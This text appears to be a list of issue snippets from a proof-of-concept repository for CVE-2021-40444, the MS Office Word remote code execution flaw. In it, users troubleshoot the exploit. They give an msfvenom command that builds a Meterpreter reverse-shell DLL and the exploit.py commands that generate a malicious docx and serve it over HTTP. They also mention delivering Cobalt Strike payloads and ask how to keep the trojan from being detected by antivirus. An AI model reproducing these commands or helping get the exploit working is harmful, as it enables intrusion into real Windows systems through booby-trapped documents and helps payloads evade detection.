CVE-2021-40444
CVE-2021-40444 copied to clipboard
CVE-2021-40444 PoC
I created my own .dll using msfvenom: `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=myip LPORT=4444 -f dll -o print.dll` Generated the malicious docx given the dll above: `sudo python3 exploit.py generate print.dll http://mypi`...
[%] CVE-2021-40444 - MS Office Word RCE Exploit [%] [*] Option is host HTML Exploit... Traceback (most recent call last): File "/usr/lib/python3.9/runpy.py", line 197, in _run_module_as_main return _run_code(code, main_globals, None,...
When I finish executing maldoc.docx in vm,,there is no championship.inf file at C:\Users\\AppData\Temp\ what should I do ?
[%] CVE-2021-40444 - MS Office Word RCE Exploit [%] [*] Option is host HTML Exploit... Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Experiencing where the Word intermittently drops msword.inf in %TEMP%. I click the Word document, it works. Close Word. Clean %TEMP% out. Then click Word document again, and it does not...
Which part of this vulnerability needs to be free from killing when it is exploited? DLL Trojan horse or the file pointed to by the update link in the doc...
Hi. Exploit does not knock on Cobalt Strike. I did everything according to the instructions, generated my dll in cobalt (it is on the VPS), then ran `python3 exploit.py host...
This is the error [%] CVE-2021-40444 - MS Office Word RCE Exploit [%] [*] Option is generate a malicious payload... [ == Options == ] [ DLL Payload: test/calc.dll [...
I was able to execute successfully on win10, but in win7, I encountered the following situations: successfully got cab ,but failed to head